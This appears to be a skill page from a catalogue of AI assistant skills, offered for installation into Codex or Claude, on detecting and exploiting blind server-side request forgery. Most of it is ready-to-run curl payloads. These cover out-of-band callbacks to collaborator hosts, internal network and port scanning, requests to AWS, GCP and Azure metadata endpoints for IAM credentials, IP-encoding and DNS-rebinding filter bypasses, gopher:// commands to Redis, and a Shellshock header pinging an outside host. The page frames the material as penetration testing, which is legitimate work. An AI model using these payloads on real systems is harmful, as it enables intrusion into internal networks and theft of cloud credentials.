Detect and exploit blind Server-Side Request Forgery vulnerabilities using out-of-band techniques, DNS interactions, and timing analysis to access internal services and cloud metadata endpoints.
Instalar com Codex ou Claude Copie este prompt, cole no Codex, Claude ou outro assistente e deixe que ele revise a página da skill e instale para você.
Um comando direto ignora o prompt de revisão. Verifique a origem antes de executá-lo.
Detect and exploit blind Server-Side Request Forgery vulnerabilities using out-of-band techniques, DNS interactions, and timing analysis to access internal services and cloud metadata endpoints.
When testing URL/webhook input parameters where server-side responses are not reflected
During assessment of applications that fetch external resources (avatars, previews, imports)
When testing PDF generators, image processors, or document converters for SSRF
During cloud security assessments to detect metadata endpoint access
When evaluating webhook functionality and URL validation implementations
How to CONFIRM a Hit (avoid false negatives)
Blind SSRF returns no reflected response, so confirmation rests entirely on out-of-band (OOB) signals — never infer success or failure from the HTTP status code alone:
Unique-subdomain DNS hit: embed a per-test subdomain (<test-id>.<your-id>.oast.fun) so each payload is attributable; an inbound DNS lookup confirms the server resolved your host even when outbound HTTP is firewalled.
HTTP/FTP callback: an inbound request landing on your interactsh/Collaborator/webhook.site listener proves full server-side egress.
Timing delta: compare a reachable internal host / open port against a dead IP / closed port; a reproducible difference (fast response vs hang-to-timeout) confirms the server reached the target.
Iterate one host/port at a time and rotate a fresh unique subdomain per payload so each callback maps back to the exact request. Absence of any reflection or error message is expected and does NOT mean "not vulnerable." Before concluding negative you MUST try: DNS-only payloads (HTTP egress may be blocked while DNS is not), alternate IP encodings, redirect-based bypasses, DNS rebinding, and gopher:// for internal services — only declare the input safe after every OOB channel stays silent.
Prerequisites
Burp Suite Professional with Burp Collaborator for OOB detection
interact.sh or webhook.site for external callback monitoring
Understanding of SSRF attack vectors and internal network enumeration
Knowledge of cloud metadata endpoints (AWS, GCP, Azure)
VPS or controlled server for advanced exploitation callback handling
Python with requests library for automation scripts
Workflow
Step 1 — Identify Blind SSRF Input Points
# Common SSRF-susceptible parameters:# url=, uri=, path=, dest=, redirect=, src=, source=
curl -X POST http://target.com/api/fetch-url \
-H \
-d
curl -X POST http://target.com/api/webhooks \
-H \
-H \
-d
curl -X POST http://target.com/api/profile/avatar \
-H \
-H \
-d
curl -X POST http://target.com/api/import \
-H \
-d
Step 2 — Confirm Blind SSRF with Out-of-Band Detection
# Use Burp Collaborator for DNS + HTTP callbacks# Generate collaborator payload: xxxxxx.oastify.com# DNS-based detection (works even with HTTP blocked)
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://dns-only-test.COLLABORATOR.oastify.com"}'# Check Collaborator for DNS lookups# HTTP-based detection
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://http-test.COLLABORATOR.oastify.com"}'# Check for HTTP requests in Collaborator# interact.sh alternative
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://RANDOM.interact.sh"}'# Monitor interact.sh dashboard for interactions
Step 3 — Enumerate Internal Network
# Scan internal IP ranges via blind SSRF# Use timing differences to determine if hosts are alive# Scan common internal rangesfor ip in 10.0.0.{1..10} 172.16.0.{1..10} 192.168.1.{1..10}; do
start=$(date +%s%N)
curl -X POST http://target.com/api/fetch -d "{\"url\": \"http://$ip/\"}" -s -o /dev/null --max-time 5
end=$(date +%s%N)
elapsed=$(( (end - start) / 1000000 ))
echo"$ip: ${elapsed}ms"done# Port scanning via blind SSRFfor port in 80 443 8080 8443 3000 5000 6379 27017 5432 3306 9200; do
curl -X POST http://target.com/api/fetch \
-d "{\"url\": \"http://127.0.0.1:$port/\"}" -s -o /dev/null -w "%{time_total}\n"echo"Port $port tested"done# Use gopher:// for more advanced internal service interaction
curl -X POST http://target.com/api/fetch \
-d '{"url": "gopher://127.0.0.1:6379/_INFO"}'
Step 4 — Access Cloud Metadata Endpoints
# AWS metadata (IMDSv1)
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://169.254.169.254/latest/meta-data/"}'# AWS IAM credentials
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'# GCP metadata
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://metadata.google.internal/computeMetadata/v1/"}'# Azure metadata
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01"}'# DNS rebinding for metadata access (bypass IP blocking)# Use services like rebinder.net to create DNS rebinding domains
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://A.169.254.169.254.1time.YOUR-REBIND-DOMAIN.com/"}'
Step 5 — Bypass SSRF Filters
# IP representation bypass
curl -X POST http://target.com/api/fetch -d '{"url": "http://0x7f000001/"}'# Hex
curl -X POST http://target.com/api/fetch -d '{"url": "http://2130706433/"}'# Decimal
curl -X POST http://target.com/api/fetch -d '{"url": "http://0177.0.0.1/"}'# Octal
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.1/"}'# Short
curl -X POST http://target.com/api/fetch -d '{"url": "http://[::1]/"}'# IPv6# URL parsing confusion
curl -X POST http://target.com/api/fetch -d '{"url": "http://target.com@127.0.0.1/"}'
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.0.0.1#@target.com/"}'# Redirect-based bypass
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://attacker.com/redirect?url=http://169.254.169.254/"}'# DNS rebinding
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://make-169-254-169-254-rr.1u.ms/"}'
Step 6 — Escalate Blind SSRF to Data Exfiltration
# Exfiltrate data via DNS (when only DNS callback works)# If you achieve SSRF to a service that reflects data:# Chain: SSRF -> internal service -> DNS exfiltration# Use gopher protocol for Redis command execution
curl -X POST http://target.com/api/fetch \
-d '{"url": "gopher://127.0.0.1:6379/_SET%20ssrf_test%20exploited%0AQUIT"}'# Chain blind SSRF with Shellshock on internal hosts
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://internal-cgi-server/cgi-bin/test.sh"}'# With User-Agent: () { :; }; /bin/bash -c "ping -c1 COLLABORATOR.oastify.com"# Exploit internal services via SSRF# Redis: write SSH key# Memcached: inject serialized objects# Elasticsearch: read indices# Internal API: access authenticated endpoints
Key Concepts
Concept
Description
Blind SSRF
Server makes request but response is not visible to attacker
Out-of-Band Detection
Using external callbacks (DNS, HTTP) to confirm SSRF execution
DNS Rebinding
Technique to bypass IP-based SSRF filters by changing DNS resolution
Cloud Metadata
Instance metadata endpoints accessible via SSRF for credential theft
Gopher Protocol
Protocol allowing crafted payloads to interact with internal TCP services
Time-Based Detection
Detecting SSRF success by measuring response time differences
SSRF Chain
Combining SSRF with other vulnerabilities for greater impact
Tools & Systems
Tool
Purpose
Burp Collaborator
Out-of-band interaction server for DNS and HTTP callback detection
interact.sh
Open-source OOB interaction tool by ProjectDiscovery
SSRFmap
Automated SSRF detection and exploitation framework
Gopherus
Generate gopher payloads for exploiting internal services via SSRF
webhook.site
Free webhook receiver for testing SSRF callbacks
rebinder.net
DNS rebinding service for bypassing SSRF IP filters
Common Scenarios
Cloud Credential Theft — Exploit blind SSRF to access AWS/GCP/Azure metadata endpoints and steal IAM credentials for cloud account compromise
Internal Service Discovery — Use timing-based blind SSRF to enumerate internal network hosts and open ports
Redis Exploitation — Chain blind SSRF with gopher:// protocol to execute commands on internal Redis instances
Webhook Abuse — Exploit webhook URL fields to scan internal networks and exfiltrate data through OOB channels
PDF Generator SSRF — Inject internal URLs into PDF generation features to exfiltrate internal content in rendered documents